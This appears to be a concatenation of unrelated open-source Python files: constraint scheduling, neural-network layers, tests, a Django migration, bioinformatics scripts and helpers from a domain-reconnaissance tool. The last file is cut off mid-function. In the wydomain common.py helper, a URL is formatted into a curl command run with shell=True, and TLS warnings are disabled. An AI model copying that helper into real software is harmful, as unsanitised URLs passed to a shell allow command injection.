from cpmpy_hakank import *
def prec(x, y, s, d):
"""
prec(x, y, s, d)
handle the precedences
the task x must be finished before task y begin
"""
return (s[x] + d[x] <= s[y])
def building_a_house(min_var="makespan"):
print("min_var :",min_var)
num_tasks = 10
# for the precedences
masonry,carpentry,plumbing,ceiling,roofing,painting,windows,facade,garden,moving = range(num_tasks)
tasks = [masonry,carpentry,plumbing,ceiling,roofing,painting,windows,facade,garden,moving]
tasks_s = ["masonry","carpentry","plumbing","ceiling","roofing","painting","windows","facade","garden","moving"]
duration = [35,15,40,15, 5,10, 5,10, 5, 5]
height = [ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] # resourse
total_duration = sum(duration)
# precendeces
num_precedences = 14
precedences = [[masonry, carpentry],
[masonry, plumbing],
[masonry, ceiling],
[carpentry, roofing],
[ceiling, painting],
[roofing, windows],
[roofing, facade],
[plumbing, facade],
[roofing, garden],
[plumbing, garden],
[windows, moving],
[facade, moving],
[garden, moving],
[painting, moving]
]
# variables
start = intvar(0,total_duration,shape=num_tasks,name="start")
end = intvar(0,total_duration,shape=num_tasks,name="end")
limitx = intvar(1,3,name="limitx")
makespan = intvar(0,total_duration,name="makespan")
# the extra objective z (see above)
z = intvar(0, 10000,name="z")
# select which variable we should minimize: makespan or z
if min_var == "makespan":
min_val = makespan # (then we ignore the z part)
else:
min_val = z
model = Model(minimize=min_val)
# constraints
if min_val == z:
model += (z ==
400 * max([end[moving]- 100, 0]) +
200 * max([25 - start[masonry], 0]) +
300 * max([75 - start[carpentry], 0]) +
100 * max([75 - start[ceiling], 0]))
else:
model += (z == 0)
for t in range(num_tasks):
model += (end[t] == start[t] + duration[t])
# makespan is the end time of the last task
model += (makespan == max(end))
# precedences
for p in range(num_precedences):
model += (prec(precedences[p][0], precedences[p][1], start, duration))
model += (my_cumulative(start, duration, height, limitx))
ss = CPM_ortools(model)
if ss.solve():
print("min_val :", min_val.value())
print("makespan:", makespan.value())
print("z :", z.value())
print("start :", start.value())
print("duration:", duration )
print("height :", height)
print("end :", end.value())
for t in range(num_tasks):
print(f"{tasks_s[t]:10s}: {start[t].value():3d}..<{duration[t]:3d}>..{end[t].value():3d}")
print()
building_a_house("makespan")
building_a_house("z")
|
Python-3/basic_examples/strings/string_isidentifier.py
|
ghiloufibelgacem/jornaldev
| 1,139 |
118470
|
s = 'xyzABC'
print(f'{s} is a valid identifier = {s.isidentifier()}')
s = '0xyz' # identifier can't start with digits 0-9
print(f'{s} is a valid identifier = {s.isidentifier()}')
s = '' # identifier can't be empty string
print(f'{s} is a valid identifier = {s.isidentifier()}')
s = '_xyz'
print(f'{s} is a valid identifier = {s.isidentifier()}')
s = 'ꝗꞨꫳ' # PEP-3131 introduced Non-ASCII characters to identifier list
print(f'{s} is a valid identifier = {s.isidentifier()}')
import unicodedata
count = 0
for codepoint in range(2 ** 16):
ch = chr(codepoint)
if ch.isidentifier():
print(u'{:04x}: {} ({})'.format(codepoint, ch, unicodedata.name(ch, 'UNNAMED')))
count = count + 1
print(f'Total Number of Identifier Unicode Characters = {count}')
|
fuxi/common/thirdparty/wydomain/common.py
|
cocobear/fuxi
| 731 |
118478
|
<filename>fuxi/common/thirdparty/wydomain/common.py
# encoding: utf-8
import re
from .config import *
import json
import subprocess
import logging
import requests as requests
import requests as __requests__
# from tldextract import extract, TLDExtract
from .utils.fileutils import FileUtils
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
if allow_http_session:
requests = requests.Session()
def is_domain(domain):
domain_regex = re.compile(
r'(?:[A-Z0-9_](?:[A-Z0-9-_]{0,247}[A-Z0-9])?\.)+(?:[A-Z]{2,6}|[A-Z0-9-]{2,}(?<!-))\Z',
re.IGNORECASE)
return True if domain_regex.match(domain) else False
def http_request_get(url, body_content_workflow=False, allow_redirects=allow_redirects, custom_cookie=""):
try:
if custom_cookie:
headers['Cookie']=custom_cookie
result = requests.get(url,
stream=body_content_workflow,
headers=headers,
timeout=timeout,
proxies=proxies,
allow_redirects=allow_redirects,
verify=allow_ssl_verify)
return result
except Exception as e:
# return empty requests object
return __requests__.models.Response()
def http_request_post(url, payload, body_content_workflow=False, allow_redirects=allow_redirects, custom_cookie=""):
""" payload = {'key1': 'value1', 'key2': 'value2'} """
try:
if custom_cookie:
headers['Cookie']=custom_cookie
result = requests.post(url,
data=payload,
headers=headers,
stream=body_content_workflow,
timeout=timeout,
proxies=proxies,
allow_redirects=allow_redirects,
verify=allow_ssl_verify)
return result
except Exception as e:
# return empty requests object
return __requests__.models.Response()
def curl_get_content(url):
try:
cmdline = 'curl "{url}"'.format(url=url)
logging.info("subprocess call curl: {}".format(url))
run_proc = subprocess.Popen(
cmdline,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(stdoutput,erroutput) = run_proc.communicate()
response = {
'resp': stdoutput.rstrip(),
'err': erroutput.rstrip(),
}
return response
except Exception as e:
pass
def save_result(filename, args):
try:
fd = open(filename, 'w')
json.dump(args, fd, indent=4)
finally:
fd.close()
def read_json(filename):
if FileUtils.exists(filename):
try:
fd = open(filename, 'r')
args = json.load(fd)
return args
finally:
fd.close()
else:
return []
|
autoPyTorch/utils/benchmarking/benchmark_pipeline/set_ensemble_config.py
|
mens-artis/Auto-PyTorch
| 1,657 |
118504
|
<filename>autoPyTorch/utils/benchmarking/benchmark_pipeline/set_ensemble_config.py
from hpbandster.core.result import logged_results_to_HBS_result
from autoPyTorch.pipeline.base.pipeline_node import PipelineNode
from autoPyTorch.utils.config.config_option import ConfigOption, to_bool
from autoPyTorch.utils.benchmarking.benchmark_pipeline.prepare_result_folder import get_run_result_dir
from copy import copy
import os
import logging
class SetEnsembleConfig(PipelineNode):
def fit(self, pipeline_config, autonet, run_result_dir):
parser = autonet.get_autonet_config_file_parser()
autonet_config = parser.read(os.path.join(run_result_dir, "autonet.config"))
if pipeline_config["ensemble_size"]:
autonet_config["ensemble_size"] = pipeline_config["ensemble_size"]
if pipeline_config["ensemble_only_consider_n_best"]:
autonet_config["ensemble_only_consider_n_best"] = pipeline_config["ensemble_only_consider_n_best"]
if pipeline_config["ensemble_sorted_initialization_n_best"]:
autonet_config["ensemble_sorted_initialization_n_best"] = pipeline_config["ensemble_sorted_initialization_n_best"]
autonet.autonet_config = autonet_config
return {"result_dir": run_result_dir,
"optimize_metric": autonet_config["optimize_metric"],
"trajectories": []}
def get_pipeline_config_options(self):
options = [
ConfigOption('ensemble_size', default=0, type=int),
ConfigOption('ensemble_only_consider_n_best', default=0, type=int),
ConfigOption('ensemble_sorted_initialization_n_best', default=0, type=int)
]
return options
|
orchestra/migrations/0082_task_tags.py
|
code-review-doctor/orchestra
| 444 |
118515
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.12 on 2018-10-02 18:47
from __future__ import unicode_literals
from django.db import migrations
import jsonfield.fields
class Migration(migrations.Migration):
dependencies = [
('orchestra', '0081_step_todolist_templates_to_apply'),
]
operations = [
migrations.AddField(
model_name='task',
name='tags',
field=jsonfield.fields.JSONField(default={'tags': []}),
),
]
|
test/programytest/parser/template/node_tests/test_conditiontype3.py
|
cdoebler1/AIML2
| 345 |
118558
|
<reponame>cdoebler1/AIML2<gh_stars>100-1000
from unittest.mock import patch
import xml.etree.ElementTree as ET
from programy.parser.template.nodes.base import TemplateNode
from programy.parser.template.nodes.condition import TemplateConditionListItemNode
from programy.parser.template.nodes.condition import TemplateConditionNode
from programy.parser.template.nodes.condition import TemplateConditionVariable
from programy.parser.template.nodes.word import TemplateWordNode
from programytest.parser.base import ParserTestsBaseClass
class MyLoopTemplateConditionNode(TemplateConditionNode):
def __init__(self, name=None, value=None, var_type=TemplateConditionVariable.GLOBAL, loop=False, condition_type=TemplateConditionNode.BLOCK, next_value=None, next_value_step=0):
TemplateConditionNode.__init__(self, name, value, var_type, loop, condition_type)
self._next_step_count = 0
self._next_value = next_value
self._next_value_step = next_value_step
def _pre_default_loop_check(self, client_context):
self._next_step_count += 1
if self._next_step_count == self._next_value_step:
client_context.bot.get_conversation(client_context).set_property(self._next_value[0], self._next_value[1])
class TemplateConditionType3NodeTests(ParserTestsBaseClass):
def test_type3_node(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateConditionNode(condition_type=3)
self.assertIsNotNone(node)
cond1 = TemplateConditionListItemNode(name="name1", value=TemplateWordNode("value1"), var_type=TemplateConditionNode.GLOBAL )
cond1.append(TemplateWordNode("Word1"))
node.append(cond1)
cond2 = TemplateConditionListItemNode(name="name2", value=TemplateWordNode("value1"), var_type=TemplateConditionNode.LOCAL )
cond2.append(TemplateWordNode("Word2"))
node.append(cond2)
cond3 = TemplateConditionListItemNode(name="name3", value=TemplateWordNode("value3"), var_type=TemplateConditionNode.BOT )
cond3.append(TemplateWordNode("Word3"))
node.append(cond3)
cond4 = TemplateConditionListItemNode(name="name4")
cond4.append(TemplateWordNode("Word4"))
node.append(cond4)
root.append(node)
self.assertEqual(len(root.children), 1)
self._client_context.bot.get_conversation(self._client_context).set_property('name1', "value1")
self._client_context.brain.properties.add_property('name3', "value3")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("Word1", result)
self._client_context.bot.get_conversation(self._client_context).set_property('name1', "value2")
self._client_context.brain.properties.add_property('name3', "value3")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("Word3", result)
def test_type3_node_with_loop(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = MyLoopTemplateConditionNode(condition_type=3, next_value=('name1', "value1"), next_value_step=1)
self.assertIsNotNone(node)
cond1 = TemplateConditionListItemNode(name="name1", value=TemplateWordNode("value1"), var_type=TemplateConditionNode.GLOBAL )
cond1.append(TemplateWordNode("Word1"))
node.append(cond1)
cond2 = TemplateConditionListItemNode(name="name2", value=TemplateWordNode("value1"), var_type=TemplateConditionNode.LOCAL )
cond2.append(TemplateWordNode("Word2"))
node.append(cond2)
cond3 = TemplateConditionListItemNode(name="name3", value=TemplateWordNode("value3"), var_type=TemplateConditionNode.BOT )
cond3.append(TemplateWordNode("Word3"))
node.append(cond3)
cond4 = TemplateConditionListItemNode(name="name4", loop=True) # Default Value
cond4.append(TemplateWordNode("Word4"))
node.append(cond4)
root.append(node)
self.assertEqual(len(root.children), 1)
self._client_context.bot.get_conversation(self._client_context).set_property('name1', "value5")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("Word4 Word1", result)
def patch_resolve_type3_to_string(self, client_context):
raise Exception ("Mock Exception")
@patch("programy.parser.template.nodes.condition.TemplateConditionNode._resolve_type3_to_string", patch_resolve_type3_to_string)
def test_type3_exception(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateConditionNode(condition_type=3)
self.assertIsNotNone(node)
cond1 = TemplateConditionListItemNode(name="name1", value=TemplateWordNode("value1"), var_type=TemplateConditionNode.GLOBAL )
cond1.append(TemplateWordNode("Word1"))
node.append(cond1)
cond2 = TemplateConditionListItemNode(name="name2", value=TemplateWordNode("value1"), var_type=TemplateConditionNode.LOCAL )
cond2.append(TemplateWordNode("Word2"))
node.append(cond2)
cond3 = TemplateConditionListItemNode(name="name3", value=TemplateWordNode("value3"), var_type=TemplateConditionNode.BOT )
cond3.append(TemplateWordNode("Word3"))
node.append(cond3)
cond3 = TemplateConditionListItemNode(name="name3")
cond3.append(TemplateWordNode("Word3"))
node.append(cond3)
root.append(node)
self.assertEqual(len(root.children), 1)
self._client_context.bot.get_conversation(self._client_context).set_property('name1', "value1")
self._client_context.brain.properties.add_property('name3', "value3")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
def test_type3_to_xml(self):
root = TemplateNode()
node = TemplateConditionNode(condition_type=3)
self.assertIsNotNone(node)
cond1 = TemplateConditionListItemNode(name="name1", value=TemplateWordNode("value1"), var_type=TemplateConditionNode.GLOBAL)
cond1.append(TemplateWordNode("Word1"))
node.append(cond1)
cond2 = TemplateConditionListItemNode(name="name2", value=TemplateWordNode("value1"), var_type=TemplateConditionNode.LOCAL )
cond2.append(TemplateWordNode("Word2"))
node.append(cond2)
cond3 = TemplateConditionListItemNode(name="name3", value=TemplateWordNode("value3"), var_type=TemplateConditionNode.BOT )
cond3.append(TemplateWordNode("Word3"))
node.append(cond3)
cond4 = TemplateConditionListItemNode(name="name4")
cond4.append(TemplateWordNode("Word4"))
node.append(cond4)
root.append(node)
xml = root.xml_tree(self._client_context)
self.assertIsNotNone(xml)
xml_str = ET.tostring(xml, "utf-8").decode("utf-8")
self.assertEqual('<template><condition><li name="name1"><value>value1</value>Word1</li> <li var="name2"><value>value1</value>Word2</li> <li bot="name3"><value>value3</value>Word3</li> <li name="name4">Word4</li></condition></template>', xml_str)
|
opendeep/optimization/rmsprop.py
|
vitruvianscience/OpenDeep
| 252 |
118573
|
<gh_stars>100-1000
"""
Generic implementation of RMSProp training algorithm.
"""
# standard libraries
import logging
# third party libraries
import theano.tensor as T
from theano.compat.python2x import OrderedDict # use this compatibility OrderedDict
# internal references
from opendeep.utils.constructors import sharedX
from opendeep.optimization.optimizer import Optimizer
log = logging.getLogger(__name__)
# All RMSProp needs to do is implement the get_updates() method for stochastic gradient descent
class RMSProp(Optimizer):
"""
From Pylearn2 (https://github.com/lisa-lab/pylearn2/blob/master/pylearn2/training_algorithms/learning_rule.py)
The RMSProp learning rule is described by Hinton in `lecture 6
<http://www.cs.toronto.edu/~tijmen/csc321/slides/lecture_slides_lec6.pdf>`
of the Coursera Neural Networks for Machine Learning course.
In short, Hinton suggests "[the] magnitude of the gradient can be very
different for different weights and can change during learning. This
makes it hard to choose a global learning rate." RMSProp solves this
problem by "[dividing] the learning rate for a weight by a running
average of the magnitudes of recent gradients for that weight."
"""
def __init__(self, dataset, loss, model=None,
epochs=10, batch_size=100, min_batch_size=1,
save_freq=None, stop_threshold=None, stop_patience=None,
learning_rate=1e-6, lr_decay=None, lr_decay_factor=None,
decay=0.95, max_scaling=1e5,
grad_clip=None, hard_clip=False):
"""
Initialize RMSProp.
Parameters
----------
dataset : Dataset
The :class:`opendeep.data.Dataset` to use when training the Model.
loss : Loss
The :class:`opendeep.optimization.loss.Loss` function to compare the model to a 'target' result.
model : Model
The :class:`opendeep.models.Model` to train. Needed if the Optimizer isn't being passed to a
Model's .train() method.
epochs : int
how many training iterations over the dataset to go.
batch_size : int
How many examples from the training dataset to use in parallel.
min_batch_size : int
The minimum number of examples required at a time (for things like time series, this would be > 1).
save_freq : int
How many epochs to train between each new save of the Model's parameters.
stop_threshold : float
The factor by how much the best validation training score needs to improve to determine early stopping.
stop_patience : int
The patience or number of epochs to wait after the stop_threshold has been reached before stopping.
learning_rate : float
The multiplicative amount to adjust parameters based on their gradient values.
lr_decay : str
The type of decay function to use for changing the learning rate over epochs. See
`opendeep.utils.decay` for options.
lr_decay_factor : float
The amount to use for the decay function when changing the learning rate over epochs. See
`opendeep.utils.decay` for its effect for given decay functions.
decay : float, optional
Decay constant similar to that used in AdaDelta and Momentum methods.
max_scaling: float, optional
Restrict the RMSProp gradient scaling coefficient to values
below `max_scaling`.
grad_clip : float, optional
Whether to clip gradients. This will clip with a maximum of grad_clip or the parameter norm.
hard_clip : bool
Whether to use a hard cutoff or rescaling for clipping gradients.
"""
# need to call the Optimizer constructor
initial_parameters = locals().copy()
initial_parameters.pop('self')
super(RMSProp, self).__init__(**initial_parameters)
assert max_scaling > 0., "Max_scaling needs to be > 0."
self.max_scaling = max_scaling
self.epsilon = 1. / self.max_scaling
self.decay = decay
self.mean_square_grads = OrderedDict()
def get_updates(self, gradients):
"""
Provides the symbolic (theano) description of the updates needed to
perform this learning rule. See Notes for side-effects.
Parameters
----------
gradients : dict
A dictionary mapping from the model's parameters to their
gradients.
Returns
-------
updates : OrderdDict
A dictionary mapping from the old model parameters, to their new
values after a single iteration of the learning rule.
Notes
-----
This method has the side effect of storing the moving average
of the square gradient in `self.mean_square_grads`. This is
necessary in order for the monitoring channels to be able
to track the value of these moving averages.
Therefore, this method should only get called once for each
instance of RMSProp.
"""
log.debug('Setting up RMSProp for optimizer...')
updates = OrderedDict()
for param in gradients:
# mean_squared_grad := E[g^2]_{t-1}
mean_square_grad = sharedX(param.get_value() * 0.)
if param.name is None:
raise ValueError("Model parameters must be named.")
mean_square_grad.name = 'mean_square_grad_' + param.name
if param.name in self.mean_square_grads:
log.warning("Calling get_updates more than once on the "
"gradients of `%s` may make monitored values "
"incorrect." % param.name)
# Store variable in self.mean_square_grads for monitoring.
self.mean_square_grads[param.name] = mean_square_grad
# Accumulate gradient
new_mean_squared_grad = (self.decay * mean_square_grad +
(1 - self.decay) * T.sqr(gradients[param]))
# Compute update
scaled_lr = self.lr_scalers.get(param, 1.) * self.learning_rate
rms_grad_t = T.sqrt(new_mean_squared_grad)
rms_grad_t = T.maximum(rms_grad_t, self.epsilon)
delta_x_t = - scaled_lr * gradients[param] / rms_grad_t
# Apply update
updates[mean_square_grad] = new_mean_squared_grad
updates[param] = param + delta_x_t
return updates
|
positional_encodings/tf_positional_encodings.py
|
tatp22/multidim-positional-encoding
| 145 |
118578
|
import tensorflow as tf
import numpy as np
class TFPositionalEncoding2D(tf.keras.layers.Layer):
def __init__(self, channels:int, return_format:str="pos", dtype=tf.float32):
"""
Args:
channels int: The last dimension of the tensor you want to apply pos emb to.
Keyword Args:
return_format str: Return either the position encoding "pos" or the sum
of the inputs with the position encoding "sum". Default is "pos".
dtype: output type of the encodings. Default is "tf.float32".
"""
super(TFPositionalEncoding2D, self).__init__()
if return_format not in ["pos", "sum"]:
raise ValueError(f'"{return_format}" is an unkown return format. Value must be "pos" or "sum')
self.return_format = return_format
self.channels = int(2 * np.ceil(channels/4))
self.inv_freq = np.float32(1 / np.power(10000, np.arange(0, self.channels, 2) / np.float32(self.channels)))
@tf.function
def call(self, inputs):
"""
:param tensor: A 4d tensor of size (batch_size, x, y, ch)
:return: Positional Encoding Matrix of size (batch_size, x, y, ch)
"""
if len(inputs.shape)!=4:
raise RuntimeError("The input tensor has to be 4d!")
_, x, y, org_channels = inputs.shape
dtype = self.inv_freq.dtype
pos_x = tf.range(x, dtype=dtype)
pos_y = tf.range(y, dtype=dtype)
sin_inp_x = tf.einsum("i,j->ij", pos_x, self.inv_freq)
sin_inp_y = tf.einsum("i,j->ij", pos_y, self.inv_freq)
emb_x = tf.expand_dims(tf.concat((tf.sin(sin_inp_x), tf.cos(sin_inp_x)), -1),1)
emb_y = tf.expand_dims(tf.concat((tf.sin(sin_inp_y), tf.cos(sin_inp_y)), -1),0)
emb_x = tf.tile(emb_x, (1,y,1))
emb_y = tf.tile(emb_y, (x,1,1))
emb = tf.concat((emb_x, emb_y),-1)
pos_enc = tf.repeat(emb[None, :, :, :org_channels], tf.shape(inputs)[0], axis=0)
if self.return_format == "pos":
return pos_enc
elif self.return_format == "sum":
return inputs + pos_enc
|
sandbox/jorvis/correct_RNAs_missing_genes.py
|
senjoro/biocode
| 355 |
118581
|
#!/usr/bin/env python3
"""
This housekeeping script reads a GFF3 file and writes a new one, adding a 'gene'
row for any RNA feature which doesn't have one. The coordinates of the RNA will
be copied.
The initial use-case here was a GFF file dumped from WebApollo which had this issue.
In this particular use case, the orphan mRNAs have ID attributes but no Parent
though this is corrected.
INPUT EXAMPLE:
###
ChromosomeII_BmicrotiR1 IGS mRNA 1467897 1468187 . + . Name=ChromosomeII_BmicrotiR1:1467871-1468187;ID=101D714C468A44840D49A6FAAD27AFE5
ChromosomeII_BmicrotiR1 IGS exon 1467897 1468187 . + . Name=DE1443B2DABA5DEDBDEBE79EB433EEB8;Parent=101D714C468A44840D49A6FAAD27AFE5;ID=DE1443B2DABA5DEDBDEBE79EB433EEB8
ChromosomeII_BmicrotiR1 IGS CDS 1467897 1468187 . + 0 Name=101D714C468A44840D49A6FAAD27AFE5-CDS;Parent=101D714C468A44840D49A6FAAD27AFE5;ID=101D714C468A44840D49A6FAAD27AFE5-CDS
Author: <NAME>
"""
import argparse
from biocode import gff
def main():
parser = argparse.ArgumentParser( description='Adds gene features for RNAs which lack them')
## output file to be written
parser.add_argument('-i', '--input', type=str, required=True, help='Path to the input GFF3 file' )
parser.add_argument('-o', '--output', type=str, required=True, help='Output GFF3 file to write' )
args = parser.parse_args()
infile = open(args.input)
ofh = open(args.output, 'wt')
for line in infile:
if line.startswith('#'):
ofh.write(line)
continue
line = line.rstrip()
cols = line.split("\t")
if len(cols) != 9:
ofh.write("{0}\n".format(line) )
continue
id = gff.column_9_value(cols[8], 'ID')
parent = gff.column_9_value(cols[8], 'Parent')
if cols[2].endswith('RNA') and parent is None:
gene_cols = list(cols)
gene_cols[2] = 'gene'
gene_cols[8] = gff.set_column_9_value(gene_cols[8], 'ID', "{0}.gene".format(id))
ofh.write("{0}\n".format("\t".join(gene_cols)) )
cols[8] = gff.set_column_9_value(cols[8], 'Parent', "{0}.gene".format(id))
ofh.write("{0}\n".format("\t".join(cols)) )
else:
ofh.write("{0}\n".format(line) )
if __name__ == '__main__':
main()
|
tests/test_line.py
|
themiwi/ggplot
| 1,133 |
118617
|
<gh_stars>1000+
from ggplot import *
import pandas as pd
import numpy as np
import random
x = np.arange(100)
random.shuffle(x)
df = pd.DataFrame({
'x': x,
'y': np.arange(100)
})
print ggplot(df, aes(x='x', y='y')) + geom_line()
print ggplot(df, aes(x='x', y='y')) + geom_path()
|
chainercv/links/model/mobilenet/mobilenet_v2.py
|
Manny27nyc/chainercv
| 1,600 |
118652
|
<filename>chainercv/links/model/mobilenet/mobilenet_v2.py
import numpy as np
import chainer
from chainer.functions import average_pooling_2d
from chainer.functions import clipped_relu
from chainer.functions import softmax
from chainer.functions import squeeze
from chainercv.links.model.mobilenet.expanded_conv_2d import ExpandedConv2D
from chainercv.links.model.mobilenet.tf_conv_2d_bn_activ import TFConv2DBNActiv
from chainercv.links.model.mobilenet.tf_convolution_2d import TFConvolution2D
from chainercv.links.model.mobilenet.util import _make_divisible
from chainercv.links.model.mobilenet.util import expand_input_by_factor
from chainercv.links.model.pickable_sequential_chain import \
PickableSequentialChain
from chainercv import utils
"""
Implementation of Mobilenet V2, converting the weights from the pretrained
Tensorflow model from
https://github.com/tensorflow/models/tree/master/research/slim/nets/mobilenet
This MobileNetV2 implementation is based on @alexisVallet's one.
@okdshin modified it for ChainerCV.
"""
def _depth_multiplied_output_channels(base_out_channels,
multiplier,
divisable_by=8,
min_depth=8):
return _make_divisible(base_out_channels * multiplier, divisable_by,
min_depth)
_tf_mobilenetv2_mean = np.asarray(
[128] * 3, dtype=np.float)[:, np.newaxis, np.newaxis]
# RGB order
_imagenet_mean = np.array(
[123.68, 116.779, 103.939], dtype=np.float32)[:, np.newaxis, np.newaxis]
class MobileNetV2(PickableSequentialChain):
"""MobileNetV2 Network.
This is a pickable sequential link.
The network can choose output layers from set of all
intermediate layers.
The attribute :obj:`pick` is the names of the layers that are going
to be picked by :meth:`__call__`.
The attribute :obj:`layer_names` is the names of all layers
that can be picked.
Examples:
>>> model = MobileNetV2()
# By default, __call__ returns a probability score (after Softmax).
>>> prob = model(imgs)
>>> model.pick = 'expanded_conv_5'
# This is layer expanded_conv_5.
>>> expanded_conv_5 = model(imgs)
>>> model.pick = ['expanded_conv_5', 'conv1']
>>> # These are layers expanded_conv_5 and conv1 (before Pool).
>>> expanded_conv_5, conv1 = model(imgs)
.. seealso::
:class:`chainercv.links.model.PickableSequentialChain`
When :obj:`pretrained_model` is the path of a pre-trained chainer model
serialized as a :obj:`.npz` file in the constructor, this chain model
automatically initializes all the parameters with it.
When a string in the prespecified set is provided, a pretrained model is
loaded from weights distributed on the Internet.
The list of pretrained models supported are as follows:
* :obj:`imagenet`: Loads weights trained with ImageNet. \
When :obj:`arch=='tf'`, the weights distributed \
at tensorflow/models
`<https://github.com/tensorflow/models/tree/master/research/slim/nets/mobilenet>`_ \ # NOQA
are used.
Args:
n_class (int): The number of classes. If :obj:`None`,
the default values are used.
If a supported pretrained model is used,
the number of classes used to train the pretrained model
is used. Otherwise, the number of classes in ILSVRC 2012 dataset
is used.
pretrained_model (string): The destination of the pre-trained
chainer model serialized as a :obj:`.npz` file.
If this is one of the strings described
above, it automatically loads weights stored under a directory
:obj:`$CHAINER_DATASET_ROOT/pfnet/chainercv/models/`,
where :obj:`$CHAINER_DATASET_ROOT` is set as
:obj:`$HOME/.chainer/dataset` unless you specify another value
by modifying the environment variable.
mean (numpy.ndarray): A mean value. If :obj:`None`,
the default values are used.
If a supported pretrained model is used,
the mean value used to train the pretrained model is used.
Otherwise, the mean value used by TF's implementation is used.
initialW (callable): Initializer for the weights.
initial_bias (callable): Initializer for the biases.
"""
# Batch normalization replicating default tensorflow slim parameters
# as used in the original tensorflow implementation.
_bn_tf_default_params = {
"decay": 0.999,
"eps": 0.001,
"dtype": chainer.config.dtype
}
_models = {
'tf': {
1.0: {
'imagenet': {
'param': {
'n_class': 1001, # first element is background
'mean': _tf_mobilenetv2_mean,
},
'overwritable': ('mean',),
'url':
'https://chainercv-models.preferred.jp/mobilenet_v2_depth_multiplier_1.0_imagenet_converted_2019_05_13.npz', # NOQA
}
},
1.4: {
'imagenet': {
'param': {
'n_class': 1001, # first element is background
'mean': _tf_mobilenetv2_mean,
},
'overwritable': ('mean',),
'url':
'https://chainercv-models.preferred.jp/mobilenet_v2_depth_multiplier_1.4_imagenet_converted_2019_05_13.npz', # NOQA
}
}
}
}
def __init__(self,
n_class=None,
pretrained_model=None,
mean=None,
initialW=None,
initial_bias=None,
arch='tf',
depth_multiplier=1.,
bn_kwargs=_bn_tf_default_params,
thousand_categories_mode=False):
if depth_multiplier <= 0:
raise ValueError('depth_multiplier must be greater than 0')
param, path = utils.prepare_pretrained_model({
'n_class': n_class,
'mean': mean,
}, pretrained_model, self._models[arch][depth_multiplier], {
'n_class': 1000,
'mean': _imagenet_mean,
})
self.mean = param['mean']
self.n_class = param['n_class']
super(MobileNetV2, self).__init__()
def relu6(x):
return clipped_relu(x, 6.)
with self.init_scope():
conv_out_channels = _depth_multiplied_output_channels(
32, depth_multiplier)
self.conv = TFConv2DBNActiv(
in_channels=3,
out_channels=conv_out_channels,
stride=2,
ksize=3,
nobias=True,
activ=relu6,
initialW=initialW,
bn_kwargs=bn_kwargs)
expanded_out_channels = _depth_multiplied_output_channels(
16, depth_multiplier)
self.expanded_conv = ExpandedConv2D(
expansion_size=expand_input_by_factor(1, divisible_by=1),
in_channels=conv_out_channels,
out_channels=expanded_out_channels,
initialW=initialW,
bn_kwargs=bn_kwargs)
in_channels = expanded_out_channels
out_channels_list = (24, ) * 2 + (32, ) * 3 + (64, ) * 4 + (
96, ) * 3 + (160, ) * 3 + (320, )
for i, out_channels in enumerate(out_channels_list):
layer_id = i + 1
if layer_id in (1, 3, 6, 13):
stride = 2
else:
stride = 1
multiplied_out_channels = _depth_multiplied_output_channels(
out_channels, depth_multiplier)
setattr(self, "expanded_conv_{}".format(layer_id),
ExpandedConv2D(
in_channels=in_channels,
out_channels=multiplied_out_channels,
depthwise_stride=stride,
initialW=initialW,
bn_kwargs=bn_kwargs))
in_channels = multiplied_out_channels
if depth_multiplier < 1:
conv1_out_channels = 1280
else:
conv1_out_channels = _depth_multiplied_output_channels(
1280, depth_multiplier)
self.conv1 = TFConv2DBNActiv(
in_channels=in_channels,
out_channels=conv1_out_channels,
ksize=1,
nobias=True,
initialW=initialW,
activ=relu6,
bn_kwargs=bn_kwargs)
self.global_average_pool = \
lambda x: average_pooling_2d(x, ksize=x.shape[2:4], stride=1)
self.logits_conv = TFConvolution2D(
in_channels=conv1_out_channels,
out_channels=self.n_class,
ksize=1,
nobias=False, # bias is needed
initialW=initialW,
initial_bias=initial_bias,
)
self.squeeze = lambda x: squeeze(x, axis=(2, 3))
self.softmax = softmax
if path:
chainer.serializers.load_npz(path, self)
if thousand_categories_mode and 1000 < n_class:
self.logits_conv.W.data = np.delete(self.logits_conv.W.data, 0, 0)
self.logits_conv.b.data = np.delete(self.logits_conv.b.data, 0)
|
what_is_the_mixin/demo2_1.py
|
NightmareQAQ/python-notes
| 106 |
118673
|
class HelloMixin:
def display(self):
print('HelloMixin hello')
class SuperHelloMixin:
def display(self):
print('SuperHello hello')
class A(SuperHelloMixin, HelloMixin):
pass
if __name__ == '__main__':
a = A()
a.display()
|
benchmarks/ud_benchmark/scripts/copy_files.py
|
apjanco/projects
| 823 |
118685
|
<gh_stars>100-1000
import typer
from pathlib import Path
import glob
import shutil
def main(stem: str, ext: str, input_dir: Path, output_dir: Path):
output_dir.mkdir(parents=True, exist_ok=True)
for filename in glob.glob(str(input_dir.resolve()) + f"/*-{stem}*.{ext}"):
shutil.copy(filename, str(output_dir.resolve()))
if __name__ == "__main__":
typer.run(main)
|
Tools/cython-epydoc.py
|
smok-serwis/cython
| 6,663 |
118721
|
#! /usr/bin/env python
# --------------------------------------------------------------------
import re
from epydoc import docstringparser as dsp
CYTHON_SIGNATURE_RE = re.compile(
# Class name (for builtin methods)
r'^\s*((?P<class>\w+)\.)?' +
# The function name
r'(?P<func>\w+)' +
# The parameters
r'\(((?P<self>(?:self|cls|mcs)),?)?(?P<params>.*)\)' +
# The return value (optional)
r'(\s*(->)\s*(?P<return>\w+(?:\s*\w+)))?' +
# The end marker
r'\s*(?:\n|$)')
parse_signature = dsp.parse_function_signature
def parse_function_signature(func_doc, doc_source,
docformat, parse_errors):
PYTHON_SIGNATURE_RE = dsp._SIGNATURE_RE
assert PYTHON_SIGNATURE_RE is not CYTHON_SIGNATURE_RE
try:
dsp._SIGNATURE_RE = CYTHON_SIGNATURE_RE
